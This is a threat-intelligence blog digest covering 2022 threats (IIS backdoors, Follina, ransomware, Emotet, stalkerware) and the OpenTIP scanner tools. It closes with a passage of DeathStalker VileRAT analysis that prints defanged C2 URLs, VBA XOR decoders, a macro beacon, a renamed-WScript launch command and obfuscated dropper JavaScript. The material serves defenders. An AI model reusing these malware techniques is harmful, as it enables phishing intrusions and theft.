The next wave saw a sudden surge in attacks, as the threat actor began abusing the ProxyLogon vulnerability to target organizations in multiple countries, including Iran, India, Malaysia, Slovakia, Russia and the UK.

Subsequently, we observed other variants and campaigns, which we attributed to the same group. In addition to affecting most of the previously mentioned countries, the threat actor targeted military and government organizations in Indonesia, Uzbekistan and Kyrgyzstan. The attack surface in the third wave was extended to desktop systems.

SessionManager IIS backdoor

In 2021, we observed a trend among certain threat actors for deploying a backdoor within IIS after exploiting one of the ProxyLogon-type vulnerabilities in Microsoft Exchange. Dropping an IIS module as a backdoor enables threat actors to maintain persistent, update-resistant and relatively stealthy access to the IT infrastructure of a target organization — to collect emails, update further malicious access or clandestinely manage compromised servers.

We published our analysis of one such IIS backdoor, called Owowa, last year. Early this year, we investigated another, SessionManager. Developed in C++, SessionManager is a malicious native-code IIS module. The attackers’ aim is for it to be loaded by some IIS applications, to process legitimate HTTP requests that are continuously sent to the server. This kind of malicious modules usually expects seemingly legitimate but specifically crafted HTTP requests from their operators, triggers actions based on the operators’ hidden instructions and then transparently passes the request to the server for it to be processed just as any other request.

As a result, these modules are not easily spotted through common monitoring practices.

SessionManager has been used to target NGOs and government organizations in Africa, South America, Asia, Europe and the Middle East.

We believe that this malicious IIS module may have been used by the GELSEMIUM threat actor, because of similar victim profiles and the use of a common OwlProxy variant.

Other malware Spring4Shell

Late in March, researchers discovered a critical vulnerability (CVE-2022-22965) in Spring, an open-source framework for the Java platform. This is a Remote Code Execution (RCE) vulnerability, allowing an attacker to execute malicious code remotely on an unpatched computer. The vulnerability affects the Spring MVC and Spring WebFlux applications running under version 9 or later of the Java Development Kit. By analogy with the well-known Log4Shell vulnerability, this one was dubbed “Spring4Shell”.

By the time researchers had reported it to VMware, a proof-of-concept exploit had already appeared on GitHub. It was quickly removed, but it is unlikely that cybercriminals would have failed to notice such a potentially dangerous vulnerability.

You can find more details, including appropriate mitigation steps, in our blog post.

Actively exploited vulnerability in Windows

Among the vulnerabilities fixed in May’s “Patch Tuesday” update was one that has been actively exploited in the wild. The Windows LSA (Local Security Authority) Spoofing Vulnerability (CVE-2022-26925) is not considered critical per se. However, when the vulnerability is used in a New Technology LAN Manager (NTLM) relay attack, the combined CVSSv3 score for the attack-chain is 9.8. The vulnerability, which allows an unauthenticated attacker to force domain controllers to authenticate with an attacker’s server using NTLM, was already being exploited in the wild as a zero-day, making it a priority to patch it.

Follina vulnerability in MSDT

At the end of May, researchers with the nao_sec team reported a new zero-day vulnerability in MSDT (the Microsoft Support Diagnostic Tool) that can be exploited using a malicious Microsoft Office document. The vulnerability, which has been designated as CVE-2022-30190 and has also been dubbed “Follina”, affects all operating systems in the Windows family, both for desktops and servers.

MSDT is used to collect diagnostic information and send it to Microsoft when something goes wrong with Windows. It can be called up from other applications via the special MSDT URL protocol; and an attacker can run arbitrary code with the privileges of the application that called up the MSD: in this case, the permissions of the user who opened the malicious document.

Kaspersky has observed attempts to exploit this vulnerability in the wild; and we would expect to see more in the future, including ransomware attacks and data breaches.

BlackCat: a new ransomware gang

It was only a matter of time before another ransomware group filled the gap left by REvil and BlackMatter shutting down operations. Last December, advertisements for the services of the ALPHV group, also known as BlackCat, appeared on hacker forums, claiming that the group had learned from the errors of their predecessors and created an improved version of the malware.

The BlackCat creators use the ransomware-as-a-service (RaaS) model. They provide other attackers with access to their infrastructure and malicious code in exchange for a cut of the ransom. BlackCat gang members are probably also responsible for negotiating with victims. This is one reason why BlackCat has gained momentum so quickly: all that a “franchisee” has to do is obtain access to the target network.

The group’s arsenal comprises several elements. One is the cryptor. This is written in the Rust language, allowing the attackers to create a cross-platform tool with versions of the malware that work both in Windows and Linux environments. Another is the Fendr utility (also known as ExMatter), used to exfiltrate data from the infected infrastructure. The use of this tool suggests that BlackCat may simply be a re-branding of the BlackMatter faction, since that was the only known gang to use the tool. Other tools include the PsExec tool, used for lateral movement on the victim’s network; Mimikatz, the well-known hacker software; and the Nirsoft software, used to extract network passwords.

Yanluowang ransomware: how to recover encrypted files

The name Yanluowang is a reference to the Chinese deity Yanluo Wang, one of the Ten Kings of Hell. This ransomware is relatively recent. We do not know much about the victims, although data from the Kaspersky Security Network indicates that threat actor has carried out attacks in the US, Brazil, Turkey and a few other countries.

The low number of infections is due to the targeted nature of the ransomware: the threat actor prepares and implements attacks on specific companies only.

Our experts have discovered a vulnerability that allows files to be recovered without the attackers’ key — although only under certain conditions — with the help of a known-plaintext attack. This method overcomes the encryption algorithm if two versions of the same text are available: one clean and one encrypted. If the victim has clean copies of some of the encrypted files, our upgraded Rannoh Decryptor can analyze these and recover the rest of the information.

There is one snag: Yanluowang corrupts files slightly differently depending on their size. It encrypts small (less than 3 GB) files completely, and large ones, partially. So, the decryption requires clean files of different sizes. For files smaller than 3 GB, it is enough to have the original and an encrypted version of the file that are 1024 bytes or more. To recover files larger than 3 GB, however, you need original files of the appropriate size. However, if you find a clean file larger than 3 GB, it will generally be possible to recover both large and small files.

Ransomware TTPs

In June, we carried out an in-depth analysis of the TTPs (tactics, techniques and procedures) (TTPs) of the eight most widespread ransomware families: Conti/Ryuk, Pysa, Clop, Hive, Lockbit2.0, RagnarLocker, BlackByte and BlackCat. Our aim was to help those tasked with defending corporate systems to understand how ransomware groups operate and how to protect against their attacks.

The report includes the following:

  • The TTPs of eight modern ransomware groups.
  • A description of how various groups share more than half of their components and TTPs, with the core attack stages executed identically across groups.
  • A cyber-kill chain diagram that combines the visible intersections and common elements of the selected ransomware groups and makes it possible to predict the threat actors’ next steps.
  • A detailed analysis of each technique with examples of how various groups use them, and a comprehensive list of mitigations.
  • SIGMA rules based on the described TTPs that can be applied to SIEM solutions.
Ransomware trends in 2022

Ahead of the Anti-Ransomware Day on May 12, we took the opportunity to outline the tendencies that have characterized ransomware in 2022. In our report, we highlight several trends that we have observed.

First, we are seeing more widespread development of cross-platform ransomware, as cybercriminals seek to penetrate complex environments running a variety of systems. By using cross-platform languages such as Rust and Golang, attackers are able to port their code, which allows them to encrypt data on more computers.

Second, ransomware gangs continue to industrialize and evolve into real businesses by adopting the techniques and processes used by legitimate software companies.

Third, the developers of ransomware are adopting a political stance, involving themselves in the conflict between Russia and Ukraine.

Finally, we offer best practices that organizations should adopt to help them defend against ransomware attacks:

  • Keep software updated on all your devices.
  • Focus your defense strategy on detecting lateral movements and data exfiltration.
  • Enable ransomware protection for all endpoints.
  • Install anti-APT and EDR solutions, enabling capabilities for advanced threat discovery and detection, investigation and timely remediation of incidents.
  • Provide your SOC team with access to the latest threat intelligence.
Emotet’s return

Emotet has been around for eight years. When it was first discovered in 2014, its main purpose was stealing banking credentials. Subsequently, the malware underwent numerous transformations to become one of the most powerful botnets ever. Emotet made headlines in January 2021, when its operations were disrupted through the joint efforts of law enforcement agencies in several countries. This kind of “takedowns” does not necessarily lead to the demise of a cybercriminal operation. It took the cybercriminals almost ten months to rebuild the infrastructure, but Emotet did return in November 2021. At that time, the Trickbot malware was used to deliver Emotet, but it is now spreading on its own through malicious spam campaigns.

Recent Emotet protocol analysis and C2 responses suggest that Emotet is now capable of downloading sixteen additional modules. We were able to retrieve ten of these, including two different copies of the spam module, used by Emotet for stealing credentials, passwords, accounts and emails, and to spread spam.

You can read our analysis of these modules, as well as statistics on recent Emotet attacks, here.

Emotet infects both corporate and private computers all around the world. Our telemetry indicates that in the first quarter of 2022, targeted: it mostly targeted users in Italy, Russia, Japan, Mexico, Brazil, Indonesia, India, Vietnam, China, Germany and Malaysia.

Moreover, we have seen a significant growth in the number of users attacked by Emotet.

Mobile subscription Trojans

Trojan subscribers are a well-established method of stealing money from people using Android devices. These Trojans masquerade as useful apps but, once installed, silently subscribe to paid services.

The developers of these Trojans make money through commissions: they get a cut of what the person “spends”. Funds are typically deducted from the cellphone account, although in some cases, these may be debited directly to a bank card. We looked at the most notable examples that we have seen in the last twelve months, belonging to the Jocker, MobOk, Vesub and GriftHorse families.

Normally, someone has to actively subscribe to a service; providers often ask subscribers to enter a one-time code sent via SMS, to counter automated subscription attempts. To sidestep this protection, malware can request permission to access text messages; where they do not obtain this, they can steal confirmation codes from pop-up notifications about incoming messages.

Some Trojans can both steal confirmation codes from texts or notifications, and work around CAPTCHA: another means of protection against automated subscriptions. To recognize the code in the picture, the Trojan sends it to a special CAPTCHA recognition service.

Some malware is distributed through dubious sources under the guise of apps that are banned from official stores, for example, masquerading as apps for downloading content from YouTube or other streaming services, or as an unofficial Android version of GTA5. In addition, they can appear in these same sources as free versions of popular, expensive apps, such as Minecraft.

Other mobile subscription Trojans are less sophisticated. When run for the first time, they ask the user to enter their phone number, seemingly for login purposes. The subscription is issued as soon as they enter their number and click the login button, and the amount is debited to their cellphone account.

Other Trojans employ subscriptions with recurring payments. While this requires consent, the person using the phone might not realize they are signing up for regular automatic payments. Moreover, the first payment is often insignificant, with later charges being noticeably higher.

You can read more about this type of mobile Trojan, along with tips on how to avoid falling victim to it, here.

The threat from stalkerware

Over the last four years, we have published annual reports on the stalkerware situation, in particular using data from the Kaspersky Security Network. This year, our report also included the results of a survey on digital abuse commissioned by Kaspersky and several public organizations.

Stalkerware provides the digital means for a person to secretly monitor someone else’s private life and is often used to facilitate psychological and physical violence against intimate partners. The software is commercially available and can access an array of personal data, including device location, browser history, text messages, social media chats, photos and more. It may be legal to market stalkerware, although its use to monitor someone without their consent is not. Developers of stalkerware benefit from a vague legal framework that still exists in many countries.

In 2021, our data indicated that around 33,000 people had been affected by stalkerware.

The numbers were lower than what we had seen for a few years prior to that. However, it is important to remember that the decrease of 2020 and 2021 occurred during successive COVID-19 lockdowns: that is, during conditions that meant abusers did not need digital tools to monitor and control their partners’ personal lives. It is also important to bear in mind that mobile apps represent only one method used by abusers to track someone — others include tracking devices such as AirTags, laptop applications, webcams, smart home systems and fitness trackers. KSN tracks only the use of mobile apps. Finally, KSN data is taken from mobile devices protected by Kaspersky products: many people do not protect their mobile devices.  The Coalition Against Stalkerware, which brings together members of the IT industry and non-profit companies, believes that the overall number of people affected by this threat might be thirty times higher — that is around a million people!

Stalkerware continues to affect people across the world: in 2021, we observed detections in 185 countries or territories.

Just as in 2020, Russia, Brazil, the US and India were the top four countries with the largest numbers of affected individuals. Interestingly, Mexico had fallen from fifth to ninth place. Algeria, Turkey and Egypt entered the top ten, replacing Italy, the UK and Saudi Arabia, which were no longer in the top ten.

We would recommend the following to reduce your risk of being targeted:

  • Use a unique, complex password on your phone and do not share it with anyone.
  • Try not to leave your phone unattended; and if you have to, lock it.
  • Download apps only from official stores.
  • Protect your mobile device with trustworthy security software and make sure it is able to detect stalkerware.

Remember also that if you discover stalkerware on your phone, dealing with the problem is not as simple as just removing the stalkerware app. This will alert the abuser to the fact that you have become aware of their activities and may precipitate physical abuse. Instead, seek help:  you can find a list or organizations that can provide help and support on the Coalition Against Stalkerware site.

2022. augusztus 11.

OpenTIP, command line edition

For more than a year, we have been providing free intelligence services via the OpenTIP portal. Using the web interface, anyone can upload and scan files with our antivirus engine, get a basic sandbox report, look up various network indicators (IP addresses, hosts, URLs). Later on, we presented an easy-to-use HTTPS-based programming interface, so that you could use the service in your own scripts and integrate it in existing workflow.

OpenTIP web interface – upload, look up, get results!

Of course, it is much easier to use the API when there is a set of working examples. It is also more convenient to integrate with existing tools and scripts when you have a command line utility that interacts with the service. We decided have both in one package, by releasing Python-based command line tools for the service that also implement a client class that you can reuse in your own tools.

A few words about privacy

The OpenTIP service has its own Terms of Use, End-User Agreement and a Privacy Policy; and the command line tools can only be accessed with an API token, that in turn can be only obtained after agreeing to all the terms. Please read them carefully. By default, the “opentip” scanner may upload the files being checked if their hashes are not yet known to the service, so please ensure that you are familiar with the policies. And, of course, the sample upload can be turned off.

Setting things up

The command line tools need the “apikey”, that is, a usual web API access token. You can generate it at this page (you may be required to register or log in into the web version of the service). The key can then be permanently set up as an environment variable “OPENTIP_APIKEY” or provided as a command line option “–apikey VALUE_OF_THE_KEY”. By default, the API key has certain rate limitations that may be changed in future, so please contact us if your scripts hit the rate limits.

The tools and the Python 3 client class can be all installed from pip:

pip3 install opentip

The code is also published on Github, so you can easily inspect and package it yourself. At the time of writing, the package has no external dependencies and should run on any modern Python 3 distribution.

Once installed, Python will also generate two executables (scripts, or binary wrappers, depending on the platform), named “opentip” and “check_iocs”.

The OpenTIP Scanner

The scanner is named “opentip” (or “opentip.exe”), as is the primary tool for quickly checking files and directories. The standard usage banner is pretty simple and self-descriptive:

usage: opentip [-h] [--no-upload] [--exclude EXCLUDE] [--log LOG] [--apikey APIKEY] [--quiet] path [path ...] Check files and directories with OpenTIP.kaspersky.com, optionally upload and scan unknown files positional arguments: path File or directory location to scan optional arguments: -h, --help show this help message and exit --no-upload DO NOT upload unknown files to scan with the Sandbox, default behaviour is to upload --exclude EXCLUDE Do not scan or upload the files matching the pattern --log LOG Write results to the log file --apikey APIKEY OpenTIP API key, received from https://opentip.kaspersky.com/token --quiet Do not log clean files

The easiest and most basic mode of operation is to provide the location of the files or directories to scan. Directories are processed recursively, and unknown files are uploaded for checking by default (subject to the privacy policy, use “–no-upload” to change default behavior). The results are printed on stdout, and can also be redirected to a log file. The “–exclude” option allows you to disable the checks for any path locations, and with the “–quiet” option the script will print out only the positive detections.

$ opentip . 2022-08-01 16:23:22,638 ./package/main.py: Malware: Trojan.Python.Lofy.a 2022-08-01 16:23:22,766 ./package/package.json: NotCategorized 2022-08-01 16:23:22,965 ./package/index.js: NoThreats

Typical output of the scanner

Since the package has no external dependencies, it can be used to quickly deploy the scanner and check a fleet of remote machines, and the OPENTIP_APIKEY environment variable makes it easier to use the scanner in containers.

The IOC checker script

The second tool, named “check_iocs”, has a different purpose: you can use it to quickly query the OpenTIP service for file hashes, domains, IPs and URLs.

usage: check_iocs [-h] [--apikey APIKEY] [--out OUT] type value Check IOCS (file hashes, IP addresses, domain names, URLs using the service OpenTIP.kaspersky.com positional arguments: type hash, ip, domain, url value Value of the IOC (hash, ip, domain, url, filename with the iocs) optional arguments: -h, --help show this help message and exit --apikey APIKEY OpenTIP API key, received from https://opentip.kaspersky.com/token --out OUT, -o OUT Write output as JSON to this filename

The script requires two arguments: the type of the input data (“hash”, “ip”, “domain”, “url”, “filename”) and either the actual value of the data to check, or the path of the filename that contains the list of values, one per line.

$check_iocs hash list_of_md5.txt [IOC]: d41d8cd98f00b204e9800998ecf8427e : Unknown [IOC]: 46c5070ed139ca8121c07eda20587e3f : {'Zone': 'Grey', 'FileGeneralInfo': {'FileStatus': 'NotCategorized', 'Sha1': '24F7BAF656DCAC1FF43E4479AD8A5F4DF8052900', 'Md5': '46C5070ED139CA8121C07EDA20587E3F', 'Sha256': '04FC2B072775EA05AB6C9E117EFBFD1C56D2F1B45D1AC175001A186452269F3C', 'FirstSeen': '1970-01-01T00:00:00Z', 'LastSeen': '1970-01-01T00:00:00Z', 'Size': 464, 'Type': 'text'}, 'DynamicAnalysisResults': {'Detections': [{'Zone': 'Red'}, {'Zone': 'Yellow'}], 'SuspiciousActivities': [{'Zone': 'Red'}, {'Zone': 'Yellow'}, {'Zone': 'Grey'}], 'NetworkActivities': [{'Zone': 'Red'}, {'Zone': 'Yellow'}, {'Zone': 'Green'}, {'Zone': 'Grey'}]}} [IOC]: 0067bc5d4d92fe9445e41f347944196e : {'Zone': 'Red', 'FileGeneralInfo': {'FileStatus': 'Malware', 'Sha1': 'F666104C83CB18F2ED345A11C34EE9A32CD2ABC1', 'Md5': '0067BC5D4D92FE9445E41F347944196E', 'Sha256': '8B615582D92D42FEEFCEEBA03E65D16773F2B227ED1CD17C82462641A9D249D9', 'FirstSeen': '2022-07-27T11:48:00Z', 'LastSeen': '2022-07-30T12:44:00Z', 'Size': 10466, 'Type': 'Txt', 'HitsCount': 10}, 'DetectionsInfo': [{'LastDetectDate': '2022-07-30T12:50:35.887Z', 'Zone': 'Red', 'DetectionName': 'Trojan.Python.Lofy.a'}], 'DynamicAnalysisResults': {'Detections': [{'Zone': 'Red'}, {'Zone': 'Yellow'}], 'SuspiciousActivities': [{'Zone': 'Red'}, {'Zone': 'Yellow'}, {'Zone': 'Grey'}], 'NetworkActivities': [{'Zone': 'Red'}, {'Zone': 'Yellow'}, {'Zone': 'Green'}, {'Zone': 'Grey'}]}} [IOC]: e1dc5ff6a1febdd4db11901fc295364f : {'Zone': 'Green', 'FileGeneralInfo': {'FileStatus': 'NoThreats', 'Sha1': '49217E09D0C33FF3C958AFBDCB60F977E10104E0', 'Md5': 'E1DC5FF6A1FEBDD4DB11901FC295364F', 'Sha256': 'EAB0020A475BB1CF70CA5C9569DEFE5F1A7160A9D334144DA47924418EE2C9E7', 'FirstSeen': '2022-07-30T10:03:00Z', 'LastSeen': '2022-07-30T10:20:00Z', 'Size': 34768, 'Type': 'Js', 'HitsCount': 10}, 'DynamicAnalysisResults': {'Detections': [{'Zone': 'Red'}, {'Zone': 'Yellow'}], 'SuspiciousActivities': [{'Zone': 'Red'}, {'Zone': 'Yellow'}, {'Zone': 'Grey'}], 'NetworkActivities': [{'Zone': 'Red'}, {'Zone': 'Yellow'}, {'Zone': 'Green'}, {'Zone': 'Grey'}]}}

Typical output of the check_iocs tool

The output is much more comprehensive than the one provided by the scanner and is JSON-encoded, so that it can be parsed automatically.

The Python API class

Both command line tools are actually using a single Python class to access the OpenTIP service, and you can use the source code of the tools as a reference for your own scripts.

The OpenTIP client can be easily instantiated with a few lines:

from opentip.client import OpenTIP client = OpenTIP(APIKEY)

To query the OpenTIP for a known indicator, use a single call:

client.get_verdict_by_ioc(ioc_type, ioc)

For example:

>>> client.get_verdict_by_ioc('hash', '0067bc5d4d92fe9445e41f347944196e') '{"Zone":"Red","FileGeneralInfo":{"FileStatus":"Malware","Sha1":"F666104C83CB18F2ED345A11C34EE9A32CD2ABC1","Md5":"0067BC5D4D92FE9445E41F347944196E","Sha256":"8B615582D92D42FEEFCEEBA03E65D16773F2B227ED1CD17C82462641A9D249D9","FirstSeen":"2022-07-27T11:48:00Z","LastSeen":"2022-07-30T12:44:00Z","Size":10466,"Type":"Txt","HitsCount":10},"DetectionsInfo":[{"LastDetectDate":"2022-07-30T12:50:35.887Z","Zone":"Red","DetectionName":"Trojan.Python.Lofy.a"}],"DynamicAnalysisResults":{"Detections":[{"Zone":"Red"},{"Zone":"Yellow"}],"SuspiciousActivities":[{"Zone":"Red"},{"Zone":"Yellow"},{"Zone":"Grey"}],"NetworkActivities":[{"Zone":"Red"},{"Zone":"Yellow"},{"Zone":"Green"},{"Zone":"Grey"}]}}'

To scan a file (with upload turned on by default), returning a tuple of (filename, results), call:

client.scan_file(filename)

Example:

>>> client.scan_file('package/main.py') ('package/main.py', '{"Zone":"Red","FileGeneralInfo":{"FileStatus":"Malware","Sha1":"F666104C83CB18F2ED345A11C34EE9A32CD2ABC1","Md5":"0067BC5D4D92FE9445E41F347944196E","Sha256":"8B615582D92D42FEEFCEEBA03E65D16773F2B227ED1CD17C82462641A9D249D9","FirstSeen":"2022-07-27T11:48:00Z","LastSeen":"2022-07-30T12:44:00Z","Size":10466,"Type":"Txt","HitsCount":10},"DetectionsInfo":[{"LastDetectDate":"2022-07-30T12:50:35.887Z","Zone":"Red","DetectionName":"Trojan.Python.Lofy.a"}],"DynamicAnalysisResults":{"Detections":[{"Zone":"Red"},{"Zone":"Yellow"}],"SuspiciousActivities":[{"Zone":"Red"},{"Zone":"Yellow"},{"Zone":"Grey"}],"NetworkActivities":[{"Zone":"Red"},{"Zone":"Yellow"},{"Zone":"Green"},{"Zone":"Grey"}]}}')

To disable file upload for unknown files, instantiate the OpenTIP with no_upload=True.

>>> client = OpenTIP(OPENTIP_APIKEY, no_upload=True) >>> client.no_upload True

Any ideas are welcome

This is just the beginning, and we welcome any kind of input, pull requests and feature requests to make the service more convenient. If you have any issues or questions regarding the scripts, please contact us by creating a Github issue or using the OpenTIP contact form.

2022. augusztus 10.

VileRAT: DeathStalker’s continuous strike at foreign and cryptocurrency exchanges

In late August 2020, we published an overview of DeathStalker’s profile and malicious activities, including their Janicab, Evilnum and PowerSing campaigns (PowerPepper was later documented in 2020). Notably, we exposed why we believe the threat actor may fit a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support competitive and financial intelligence efforts.

Meanwhile, in August 2020, we also released a private report on VileRAT to our threat intelligence customers for the first time. VileRAT is a Python implant, part of an evasive and highly intricate attack campaign against foreign exchange and cryptocurrency trading companies. We discovered it in Q2 2020 as part of an update of the Evilnum modus operandi, and attributed it to DeathStalker. Malicious activities that we associate with DeathStalker’s VileRAT track have been publicly and partly documented since, without any attribution or under different monikers (Evilnum, PyVil), starting in September 2020, through 2021 and more recently in June 2022.

DeathStalker has indeed continuously leveraged and updated its VileRAT toolchain against the same type of targets since we first identified it in June 2020. While we comprehensively documented the evolution to our threat intelligence customers recently, and despite existing public indicators of compromise, we regret to note that the campaign is not only ongoing at the time of writing, but also that DeathStalker likely increased its efforts to compromise targets using this toolchain recently. We have indeed been able to identify more samples of VileRAT-associated malicious files and new infrastructure since March 2022, which may be a symptom of an increase in compromise attempts. We deemed it may be helpful to publicly expose some of our knowledge about VileRAT, to help potential targets better detect and stop such malicious activities.

VileRAT’s initial infection and toolset overview

Back in the summer of 2020, DeathStalker’s VileRAT initial infection consisted in spear-phishing emails sent to foreign exchange companies, from fake personas (a fake diamonds trading company for instance) who shared investment interests. Should the target reply and continue with the conversation, the fake persona would at some point and upon request provide a link to a malicious file hosted on Google Drive (a Windows shortcut file masquerading as a PDF or in a ZIP archive), as identification documents. The malicious link would then trigger the execution of arbitrary system commands, to drop a harmless decoy document, as well as a malicious and quite sophisticated binary loader that we dubbed VileLoader.

More recently, since at least late 2021, the infection technique has changed slightly, but the initial infection vector is still a malicious message: a Word document (DOCX, see Figure 1) is sent to targets via email (either as an attachment or embedded in the email body whenever possible). In July 2022, we also noticed that the attackers leveraged chatbots that are embedded in targeted companies’ public websites to send malicious DOCX to their targets.

Figure 1. Malicious DOCX social engineering message

The DOCX documents are frequently named using the “compliance” or “complaint” keywords (as well as the name of the targeted company), suggesting the attacker is answering an identification request or expressing an issue as a reason to send them.

The initial infection and toolset deployment, as we observed them starting in at least late 2021, are schematized below (see Figure 2).

Figure 2. VileRAT infection and toolset overview

A bit of stomping and concealment up to VileDropper

The initial DOCX infection document itself is innocuous, but it contains a link to another malicious and macro-enabled DOTM document as a “remote template” (see Figure 3). These DOTM files are automatically downloaded by Word when the DOCX is opened, and its embedded macro is triggered if the recipient enabled execution (as requested by the social engineering message, see Figure 1).

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://plantgrn[.]com/HjSYaquyA5umRSZcy%2B0xLfaIdgf5Qq8BA6EggZELrzkAAADvNjKmxl00LiQYCUFp2DSHYB8NW18l94y4JmYJq84iAcUK4DiouvcYORosLa5BzVcmWShg6Y6sjwg%3D" TargetMode="External"/> </Relationships>

Figure 3. Malicious remote template inclusion in infection DOCX

The malicious DOTM remote templates leverage the VBA stomping technique to conceal the code of an embedded macro. VBA stomping involves making the editable VBA source code (i.e., the visible code of a macro) different from the code that will actually be executed. This is possible because both the editable (visible) source code and a transformed internal version of it called p-code are embedded in macro-enabled documents. As a result of VBA stomping, the real macro code that will be executed is hidden from standard tools (Microsoft Word’s macro edition tools, but also OLETools).

This technique comes with a drastic limitation: the hidden macro (i.e., internal p-code) can only be executed if the macro-enabled document is opened with the same Office version from which it was generated. Otherwise, the hidden macro cannot run, and the visible one will be executed instead. In this last case, DeathStalker ensured it would result in a popup message to the user (see Figure 4). But most of all, DeathStalker ensured that it distributed several variants of infection documents to their targets, each one being prepared for a specific Office version.

Figure 4. VBA stomping failure in a malicious DOTM remote template

In any case, the visible and hidden macros download a picture to replace the social engineering message in the infection document (see Figure 5) and trick the readers into believing something failed.

Figure 5. Example of a downloaded image upon macro execution

In the background, however, provided the VBA stomping worked, the DOTM-embedded macro silently gathers information about security products that are installed on the target computer (using WMI), sends them to a command-and-control (C2) server, decodes and drops files, then ultimately executes a malicious obfuscated JavaScript (JS) backdoor we called VileDropper.

The DOTM-embedded macro itself already reveals some interesting and specific techniques. It is lightly obfuscated, as most text strings are XOR-encoded (see Figure 6) with a password that is derived from a sentence (e.g., “Operates Catholic small towns pueblos Two of“).

Function decodestring(dt As String) As String On Error Resume Next Dim ks As String ks = decodepassword Dim dl As Long dl = ((Len(dt) / 2) - 1) kl = Len(ks) Dim s As String s = "" For i = 0 To dl Dim c1 As Integer Dim c2 As Integer c1 = Val("&H" & Mid(dt, ((i * 2) + 1), 2)) c2 = Asc(Mid(ks, (i Mod kl) + 1, 1)) s = s & Chr(c1 Xor c2) Next decodestring = s End Function

Figure 6. XOR decoding function (renamed for clarity) in DOTM-embedded macro

The XOR decoding algorithm looks very close to the one that has been leveraged in VBS loader scripts from the PowerPepper toolchain (see Figure 7) in the past, and seemingly legitimate function names are also reminiscent of those that were used by PowerPepper macros (e.g., “insert_table_of_figures”, “change_highlight_color”, etc.).

Function DelPort(GeneralText) Dim Argv : Argv = WScript.Arguments(0) GeneralText = Replace(GeneralText, "44f","44") Dim z, i, cvpo, vpcol, sdfiko, gfdvvc, sdfopk For i = 1 To Len(GeneralText) cvpo = cvpo + 1 If cvpo > Len(Argv) Then cvpo = 1 gfdvvc = Asc(Mid(Argv, cvpo, 1)) If i > Len(GeneralText) \ 2 Then Exit For vpcol = CByte("&H" & Mid(GeneralText, i * 2 - 1, 2)) sdfiko = vpcol Xor gfdvvc z = z & Chr(sdfiko) Next DelPort = z End Function

Figure 7. XOR decoding function in a PowerPepper VBS loader (MD5 DB6D1F6AB887383782E4E3D6E4AACDD0)

The DOTM-embedded macro decodes and drops two files (in the “%APPDATA%” folder: “Redist.txt” and “ThirdPartyNotice.txt”, or “pattern.txt” and “changelog.txt”) out of encoded data that is stored in non-visible TextBox forms (see Figure 8). Leveraging Office object properties as hidden data sources is also something we have previously seen with PowerPepper.

Figure 8. TextBox form used as a data store within malicious DOTM documents, as shown by Microsoft’s VBA editor

Another notable feature is that the DOTM-embedded macro signals progression or errors during the execution by sending HTTP GET requests to fixed C2 URLs. Interestingly, all HTTP requests in the VBA macro are triggered using remote picture insertion functions (see Figure 9).

doc.Shapes.AddPicture (decodestring("09184015545D5B1B1B07501E001F5C4B0D1D5B3B2D3647143422115728383E1D3E2A024B06025B...0F1C02301C4B57743F190273173713384258545B46582D5C242F3335565C234123543853115838183D21156116500F5C210A2717462327073A362E765C370347362B267F1035230C1036")) ' hxxp://hubflash[.]co/HCSqfUN%2FJJnPO49gnojrpDo%2BMxnGrYaL161m49AhAAAA%2FwQ5Tgt6JlNO pWd1chDdUc5MB1HWBB9Yq3EECIbTO8uX

Figure 9. DOTM-embedded macro leverages “AddPicture” as a Web client

In any case, the DOTM-embedded macro finally triggers VileDropper’s execution, using a renamed copy of the “WScript” interpreter (“msdcat.exe” or “msgmft.exe” in the “%APPDATA%” folder), with a command such as:

msgmft.exe /E:jScrIpt "\changelog.txt" 91 pattern.txt

“changelog.txt” is VileDropper, while “91” is part of password used by VileDropper to decode XORed data, and “pattern.txt” is an encoded package that contains VileLoader.

VileDropper: an overly obfuscated task scheduler

Next in DeathStalker’s intricate VileRAT infection chain comes VileDropper. It is an obfuscated JavaScript file that mainly drops and schedules the execution of the next stage: VileLoader.

var _0x140c9e;//ACCS3 _0x36bbe9: {//ACCS3 try {//ACCS3 var _0x527036 = _0x112a30 + '\x5c' + WScript[_0x1dbcbb(0x38c)](0x1),//ACCS3 _0x33ee6e = _0x3b3918[_0x4462ad[_0x1dbcbb(0x312)](_0x4459df, _0x4462ad[_0x1dbcbb(0x23d)])](_0x527036, 0x1),//ACCS3 _0x46efdf = _0x33ee6e[_0x4459df(_0x1dbcbb(0x1e7) + _0x1dbcbb(0x29c))]();//ACCS3 _0x33ee6e[_0x1dbcbb(0x37a)](), _0x3b3918[_0x1dbcbb(0x38f)](_0x527036), _0x527036 = '';//ACCS3 for (_0x33ee6e = 0x0; _0x33ee6e < _0x46efdf[_0x1dbcbb(0x2fa)] - 0x2; _0x33ee6e += 0x2)//ACCS3 _0x527036 += String[_0x1dbcbb(0x259) + 'de'](parseInt(_0x46efdf[_0x1dbcbb(0x2f4)](_0x33ee6e, _0x33ee6e + 0x2), 0x10));//ACCS3 _0x140c9e = _0x527036;//ACCS3 break _0x36bbe9;//ACCS3 } catch (_0x48c9c6) {}//ACCS3 _0x140c9e = void 0x0;//ACCS3 }//ACCS3

Figure 10. VileDropper code excerpt in its original form

VileDropper needs at least two arguments to run for the first time (a third may be used as a flag to trigger environment-specific execution variations, depending on security products that are installed on targeted computers):

  • the first one is a partial password (used to decode XOR-encoded data),
  • the second is a path to an encoded payload file (contains VileLoader and its companion shellcode).

VileDropper also checks its interpreter and file name, to immediately stop execution if it is not called as planned (this is probably done to evade sandboxes), as can be seen in the following deobfuscated code excerpt:

if (aWShell1["CurrentDirectory"]["toLowerCase"]() != aAppDataPath1["toLowerCase"]()) { WScript["Quit"](); } if (!sArgThird1) { if (-0x1 == aScriptHostFullpath1["indexOf"]("msdcat")) { WScript["Quit"](); } } else { if (-0x1 == aScriptHostFullpath1["indexOf"]("cscript")) { WScript["Quit"](); } }

Figure 11. Deobfuscated execution check in VileDropper

VileDropper’s exact execution flow depends on the security products that are installed on the targeted computer, but most of the time, it copies itself to another file, relaunches itself, and deletes its original copy. During execution VileDropper:

  • gathers additional data on the targeted environment (using WMI) as well as generating a target identifier and sends them to a C2 server;
